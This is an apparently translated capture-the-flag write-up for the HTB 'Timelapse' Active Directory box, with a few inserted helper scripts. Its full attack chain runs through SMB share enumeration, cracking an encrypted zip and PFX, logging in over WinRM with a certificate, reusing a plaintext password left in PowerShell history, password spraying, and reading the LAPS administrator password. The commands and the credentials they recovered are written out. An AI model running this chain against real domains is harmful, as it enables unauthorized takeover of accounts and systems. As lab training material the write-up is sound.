Tracks-AD-Timelapse


nmap

└─$ sudo nmap -sU 10.10.11.152 --top-ports=200 --min-rate=2000
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 01:35 EST
Nmap scan report for 10.10.11.152
Host is up (0.36s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

└─$ sudo nmap -sS 10.10.11.152 -p- --min-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 01:34 EST
Stats: 0:00:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 55.94% done; ETC: 01:35 (0:00:43 remaining)
Nmap scan report for 10.10.11.152
Host is up (0.28s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49690/tcp open unknown

ldap

└─$ ldapsearch -x -H ldap://10.10.11.152  -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=timelapse,DC=htb
ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=timelapse,DC=htb
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
ation,DC=timelapse,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=timelapse,DC=htb
namingContexts: CN=Configuration,DC=timelapse,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 131193
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
CN=Sites,CN=Configuration,DC=timelapse,DC=htb
dnsHostName: dc01.timelapse.htb
defaultNamingContext: DC=timelapse,DC=htb
currentTime: 20241228145015.0Z
configurationNamingContext: CN=Configuration,DC=timelapse,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
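The rootDSE dump above is the first thing worth reading on an unauthenticated LDAP port, but picking the useful attributes out of folded LDIF by eye is error-prone. The following is an added example (not part of the original write-up) that unfolds LDIF continuation lines, groups multi-valued attributes, and summarizes the fields a reviewer cares about; the functional-level mapping is the standard DS_BEHAVIOR table, and the sample LDIF is constructed from the values shown on the page (with the leading space that LDIF folding actually uses).

```python
"""Parse an ldapsearch rootDSE LDIF dump and summarize the domain.

Added example, not part of the original write-up. The sample LDIF below is
constructed from the values shown on the page; continuation lines carry the
single leading space that LDIF uses for folded lines.
"""
import base64
from collections import defaultdict

# domainFunctionality / forestFunctionality values (DS_BEHAVIOR_* constants).
FUNCTIONAL_LEVELS = {
    0: "Windows 2000",
    1: "Windows Server 2003 interim",
    2: "Windows Server 2003",
    3: "Windows Server 2008",
    4: "Windows Server 2008 R2",
    5: "Windows Server 2012",
    6: "Windows Server 2012 R2",
    7: "Windows Server 2016",
}

# Constructed sample in ldapsearch's LDIF output shape.
SAMPLE_LDIF = """\
# extended LDIF
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=timelapse,DC=htb
ldapServiceName: timelapse.htb:dc01$@TIMELAPSE.HTB
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=timelapse,DC=htb
namingContexts: DC=timelapse,DC=htb
namingContexts: CN=Configuration,DC=timelapse,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingContexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingContexts: DC=ForestDnsZones,DC=timelapse,DC=htb
dnsHostName: dc01.timelapse.htb
defaultNamingContext: DC=timelapse,DC=htb
"""


def unfold_ldif(text):
    """Join LDIF folded lines (a continuation line starts with one space)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        elif raw.startswith("#") or not raw.strip():
            continue  # comments and blank record separators
        else:
            lines.append(raw)
    return lines


def parse_ldif_entry(text):
    """Return {attribute: [values]} for one LDIF entry; '::' values are base64."""
    attrs = defaultdict(list)
    for line in unfold_ldif(text):
        name, _, value = line.partition(":")
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        attrs[name.strip()].append(value)
    return dict(attrs)


def summarize_rootdse(text):
    """Pull the fields a reviewer cares about out of a rootDSE dump."""
    attrs = parse_ldif_entry(text)

    def first(key):
        return attrs.get(key, [""])[0]

    level = int(first("domainFunctionality") or -1)
    return {
        "dns_host": first("dnsHostName"),
        "domain": first("defaultNamingContext"),
        "domain_level": FUNCTIONAL_LEVELS.get(level, f"unknown ({level})"),
        "server_dn": first("serverName"),
        "naming_contexts": attrs.get("namingContexts", []),
        "sasl": attrs.get("supportedSASLMechanisms", []),
        "ldap_versions": sorted(int(v) for v in attrs.get("supportedLDAPVersion", [])),
    }


if __name__ == "__main__":
    for key, value in summarize_rootdse(SAMPLE_LDIF).items():
        print(f"{key}: {value}")
```

Feed it the raw output of `ldapsearch -x -H ldap://<dc> -s base` and the folded `serverName` and `dsServiceName` values come back on one line, which is what you want before grepping or diffing DC inventories.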

to User

SMB anonymous access


└─$ smbmap -u anonymous -p '' -H 10.10.11.152

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.152:445 Name: 10.10.11.152 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share

The Shares share is readable.


┌──(fonllge㉿harusaruhi)-[~/Desktop/htb/Timelapse]
└─$ smbmap -u anonymous -p '' -H 10.10.11.152 -r Shares

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.152:445 Name: 10.10.11.152 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
./Shares
dr--r--r-- 0 Mon Oct 25 11:55:14 2021 .
dr--r--r-- 0 Mon Oct 25 11:55:14 2021 ..
dr--r--r-- 0 Mon Oct 25 15:40:06 2021 Dev
dr--r--r-- 0 Mon Oct 25 11:55:14 2021 HelpDesk
SYSVOL NO ACCESS Logon server share

HelpDesk contains some LAPS-related material.

LAPS is the tool that automatically rotates local administrator passwords in the domain; worth reading up on:

https://trustedsec.com/blog/a-lapse-in-judgement

https://learn.microsoft.com/zh-tw/windows-server/identity/laps/laps-overview

The Dev directory contains a winrm_backup.zip.

└─$ zipinfo winrm_backup.zip           
Archive: winrm_backup.zip
Zip file size: 2611 bytes, number of entries: 1
-rwxr-xr-x 3.0 unx 2555 BX defN 21-Oct-25 10:21 legacyy_dev_auth.pfx
1 file, 2555 bytes uncompressed, 2393 bytes compressed: 6.3%

Inside it is a PFX certificate. The zip is encrypted, so export the hash with zip2john and try cracking the password.

└─$ zip2john winrm_backup.zip > ziphash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip$1*1*2*0*965*9fb*12ec5683*0*4e*8*965*72aa*1a84b40ec6b5c20abd7d695aa16d8c88a3cec7243acf179b842f2

Since I use hashcat, the header of the exported hash needs to be reformatted.

hashcat's format is as follows:

└─$ hashcat --example|grep -i pkzip
Name................: PKZIP (Compressed)
Example.Hash........: $pkzip2$1*1*2*0*e3*1c5*eda7a8de*0*28*8*e3*eda7*...zip2$ [Truncated, use --mach for full length]
Name................: PKZIP (Uncompressed)
Example.Hash........: $pkzip2$1*1*2*0*1d1*1c5*eda7a8de*0*28*0*1d1*eda...zip2$ [Truncated, use --mach for full length]
Name................: PKZIP (Compressed Multi-File)
Example.Hash........: $pkzip2$3*1*1*0*8*24*a425*8827*d1730095cd829e24...zip2$ [Truncated, use --mach for full length]
Name................: PKZIP (Mixed Multi-File)
Example.Hash........: $pkzip2$3*1*1*0*0*24*3e2c*3ef8*0619e9d17ff3f994...zip2$ [Truncated, use --mach for full length]
Name................: PKZIP (Mixed Multi-File Checksum-Only)
Example.Hash........: $pkzip2$8*1*1*0*8*24*a425*8827*3bd479d541019c2f...zip2$ [Truncated, use --mach for full length]
Name................: PKZIP Master Key
Name................: PKZIP Master Key (6 byte optimization)

Strip the leading path, changing it to:

$pkzip$1*1*2*0*965*9fb*12ec5683*0*4e*8*965*72aa*1a84b40ec6b5c20abd7d695aa16d8c88a3cec7243acf179b842f2d96414d306fd67f0bb6abd97366b7aaea736a0
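Stripping the `archive/member:` prefix by hand works for one hash, but it is easy to get wrong (and to pick the wrong mode) when zip2john emits several. The following is an added example, not part of the original write-up, that does the conversion: it drops the prefix, optionally rewrites the `$pkzip$`/`$/pkzip$` signature to the `$pkzip2$`/`$/pkzip2$` form shown by `hashcat --example`, and reads the compression-type field to choose between 17200 (compressed) and 17210 (uncompressed). The sample line is constructed with shortened hex fields and is not the box's real hash; the field positions follow john's documented single-file pkzip layout.

```python
"""Convert zip2john output into a hashcat-ready PKZIP hash.

Added example, not part of the original write-up. zip2john prefixes each hash
with "archive/member:" and uses the $pkzip$ / $/pkzip$ signature, while
hashcat's --example output for modes 17200/17210 shows $pkzip2$ / $/pkzip2$.
The sample line below is constructed (hex fields shortened) and is not the
box's real hash.
"""
import re

# Constructed sample in zip2john's output shape.
SAMPLE_JOHN_LINE = (
    "winrm_backup.zip/legacyy_dev_auth.pfx:"
    "$pkzip$1*1*2*0*965*9fb*12ec5683*0*4e*8*965*72aa*1a84b40ec6b5c20a*$/pkzip$"
)

# Single-file layout after the signature, '*'-separated:
#   count, binary-flag, data-type, magic-type, compressed-len, uncompressed-len,
#   crc, offset, extra-offset, compression-type, data-len, checksum, data
# compression-type 8 = deflate (hashcat 17200), 0 = stored (hashcat 17210).
COMPRESSION_TYPE_INDEX = 9
HASHCAT_MODES = {"8": 17200, "0": 17210}


def john_to_hashcat(line, v2_signature=True):
    """Strip the 'archive/member:' prefix and optionally normalize the signature."""
    line = line.strip()
    idx = line.find("$pkzip")
    if idx < 0:
        raise ValueError("not a pkzip hash line")
    h = line[idx:]
    if v2_signature:
        h = re.sub(r"^\$pkzip\$", "$pkzip2$", h)
        h = re.sub(r"\$/pkzip\$$", "$/pkzip2$", h)
    return h


def guess_mode(hashline):
    """Choose 17200 or 17210 from the compression-type field of a single-file hash."""
    body = re.sub(r"^\$pkzip2?\$", "", hashline)
    fields = body.split("*")
    if fields[0] != "1":
        raise ValueError("multi-file archives use the multi-file modes; not handled here")
    try:
        return HASHCAT_MODES[fields[COMPRESSION_TYPE_INDEX]]
    except (IndexError, KeyError):
        raise ValueError("unrecognized compression type field") from None


def convert_file(text):
    """Convert every hash line of a zip2john output file; returns (mode, hash) pairs."""
    out = []
    for line in text.splitlines():
        if "$pkzip" not in line:
            continue  # zip2john's "ver 2.0 efh ..." diagnostics go to stderr, skip anyway
        h = john_to_hashcat(line)
        out.append((guess_mode(h), h))
    return out


if __name__ == "__main__":
    for mode, h in convert_file(SAMPLE_JOHN_LINE):
        print(f"hashcat -m {mode} '{h}' wordlist.txt")
```

The compressed-length field (`965`, i.e. 2405) and uncompressed-length field (`9fb`, i.e. 2555) match the `cmplen`/`decmplen` that zip2john prints, which is a quick sanity check that you copied the whole hash and not a truncated line.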

I tried modes 17210 and 17200; the latter, 17200, worked.

It cracked to supremelegacy.

The certificate also has a password and cannot be used directly, so its hash needs to be exported and cracked as well.

pfx2john legacyy_dev_auth.pfx > pfxhash

Here I used john.

└─$ john -format=pfx pfxhash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:15 DONE (2024-12-28 10:35) 0.06662g/s 215306p/s 215306c/s 215306C/s thumper1990..thsco04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Got thuglegacy.

At this point I wanted to use PKINIT to get the NT hash.

Because the current PFX is password-protected, it needs to be decrypted and a new one generated. I'll do this in two ways:

  • 1. Convert it directly with certipy

└─$ certipy cert -export -pfx Dev/legacyy_dev_auth.pfx  -password "thuglegacy" -out "legacyy_unprotected.pfx"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'legacyy_unprotected.pfx'
  • 2. Split out the crt and key, remove the password, and regenerate the PFX

Export the key and convert its format:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy.key

└─$ openssl rsa -in legacyy.key -out legacyy_new_nop.key
Enter pass phrase for legacyy.key:
writing RSA key

Then export the crt:

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out legacyy.crt

Create the new PFX. No password is needed here; just press Enter twice:

openssl pkcs12 -export -inkey  legacyy_new_nop.key -in legacyy.crt -out new.pfx

Now test it with openssl -info and an empty import password. The PEM pass phrase is also empty, but you need to enter something of more than 4 characters twice before it will display:

openssl pkcs12 -in new.pfx -info 

Enter Import Password:
MAC: sha256, Iteration 2048
MAC length: 32, salt length: 8
PKCS7 Encrypted data: PBES2, PBKDF2, AES-256-CBC, Iteration 2048, PRF hmacWithSHA256
Certificate bag
Bag Attributes
localKeyID: D0 D2 86 AE 3B 8D FB 77 98 34 AD AB 23 EB 21 E6 6F 7B 7A DE
subject=CN=Legacyy
issuer=CN=Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS

With the certificate in hand, try requesting a TGT via PKINIT:

└─$ certipy auth -pfx new.pfx -dc-ip 10.10.11.152 -domain timelapse.htb -username legacyy
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: legacyy@timelapse.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

It errored out; the target presumably doesn't have PKINIT enabled.

I found an article on lateral movement with ADCS. It has little to do with this box but is still worth reading: PKINIT was blocked there too, yet they still got an LDAP shell.
https://www.mwrcybersec.com/active-and-certified

Since PKINIT is dead and we can't get the hash, PassTheCert or other tools could be used. Here I connected directly with evil-winrm; since we have a certificate, add -S to use TLS.

└─$ evil-winrm -S -c legacyy.crt -k legacyy_nopasswd.key -i 10.10.11.152 -u legacyy 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> ls

get User

to Root

While poking around locally as the legacyy user, I found the PowerShell history.

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
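The foothold here is a credential typed into an interactive session and persisted by PSReadLine, so it is a natural thing to hunt for on your own estate. The following is an added example, not part of the original write-up: a small defensive scanner that runs over the text of `ConsoleHost_history.txt`, flags the common shapes of inline secrets (`ConvertTo-SecureString ... -AsPlainText`, `net use ... /user:`, literal `-Password` arguments, `PSCredential` constructed from a literal user), and reports them with the secret redacted so the report itself does not become a new leak. The sample history is constructed and the passwords in it are placeholders, not the box's real one.

```python
"""Flag plaintext credentials left in PowerShell history files.

Added example, not part of the original write-up: a defensive scanner over
PSReadLine's ConsoleHost_history.txt. The sample history below is
constructed; the passwords in it are placeholders.
"""
import re

SAMPLE_HISTORY = """\
whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'P@ssw0rd-PLACEHOLDER' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net use \\\\fs01\\share /user:CORP\\backup 'Summer2024-PLACEHOLDER'
get-aduser -filter * -properties *
exit
"""

# (rule name, regex). Where a literal secret can be isolated it is captured
# as group "secret" so the report can redact it; "user" is captured when present.
RULES = [
    ("ConvertTo-SecureString with -AsPlainText literal",
     re.compile(r"ConvertTo-SecureString\b(?=.*-AsPlainText).*?(?P<q>['\"])(?P<secret>.*?)(?P=q)", re.I)),
    ("net use with inline password",
     re.compile(r"net\s+use\b.*?/user:(?P<user>\S+)\s+(?P<q>['\"]?)(?P<secret>[^\s'\"]+)(?P=q)", re.I)),
    ("-Password/-Pass parameter with literal",
     re.compile(r"-(?:Password|Pass)\s+(?P<q>['\"]?)(?P<secret>[^\s'\"$][^\s'\"]*)(?P=q)", re.I)),
    ("PSCredential constructed from literal user",
     re.compile(r"PSCredential\s*\(\s*['\"]?(?P<user>[^'\",\s]+)['\"]?\s*,", re.I)),
]


def redact(secret):
    """Keep just enough of the secret to confirm a match without re-logging it."""
    if len(secret) <= 4:
        return "*" * len(secret)
    return secret[:2] + "*" * (len(secret) - 4) + secret[-2:]


def scan_history(text, path="ConsoleHost_history.txt"):
    """Return one finding dict per history line that matches a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            gd = m.groupdict()
            findings.append({
                "path": path,
                "line": lineno,
                "rule": name,
                "user": gd.get("user"),
                "secret": redact(gd["secret"]) if gd.get("secret") else None,
            })
            break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"{f['path']}:{f['line']} {f['rule']} user={f['user']} secret={f['secret']}")
```

On a real host the file lives under each profile at `AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`, the same path the write-up reads above; the scanner only needs the file contents, so it runs just as well over a forensic image or a central collection of those files.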

Got svc_deploy's password: E3R$Q62^12p7PLlC%KWaxuaV

Verify it:

└─$ kerbrute passwordspray ./user 'E3R$Q62^12p7PLlC%KWaxuaV' --dc 10.10.11.152 -d timelapse.htb

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/28/24 - Ronnie Flathers @ropnop

2024/12/28 14:24:26 > Using KDC(s):
2024/12/28 14:24:26 > 10.10.11.152:88

2024/12/28 14:24:28 > [+] VALID LOGIN: svc_deploy@timelapse.htb:E3R$Q62^12p7PLlC%KWaxuaV
2024/12/28 14:24:28 > Done! Tested 16 logins (1 successes) in 2.270 seconds

Running BloodHound shows that the LAPS_Readers group, which svc_deploy belongs to, has ReadLAPSPassword over dc01$.


Put plainly, this permits reading the ms-Mcs-AdmPwd attribute of the target machine, which holds its Administrator password; that is how LAPS works.

PowerView or any other tool works; all that matters is being able to read the DC's ms-Mcs-AdmPwd attribute.

└─$ python3 ~/tools/wintools/bloodyAD/bloodyAD.py  --dc-ip 10.10.11.152 -d timelapse.htb --host dc01.timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' get object 'dc01$' --attr ms-Mcs-AdmPwd

distinguishedName: CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-Mcs-AdmPwd: MXBQ6@J(je.mb[L%e!m1S03&

With the password, I used smbclient. HTB put the flag under a different user here.

 smbclient  '\\10.10.11.152\C$' -U administrator%'MXBQ6@J(je.mb[L%e!m1S03&'
smb: \Users\trx\desktop\> dir
. DR 0 Fri Mar 4 01:45:48 2022
.. DR 0 Fri Mar 4 01:45:48 2022
desktop.ini AHS 282 Fri Mar 4 01:45:48 2022
root.txt AR 34 Sat Dec 28 09:33:46 2024

get Root


This box is too simple to dwell on. The only part that requires some thought is digging through AppData; running winPEAS directly would have shown the PowerShell history, but it is still better to poke around by hand.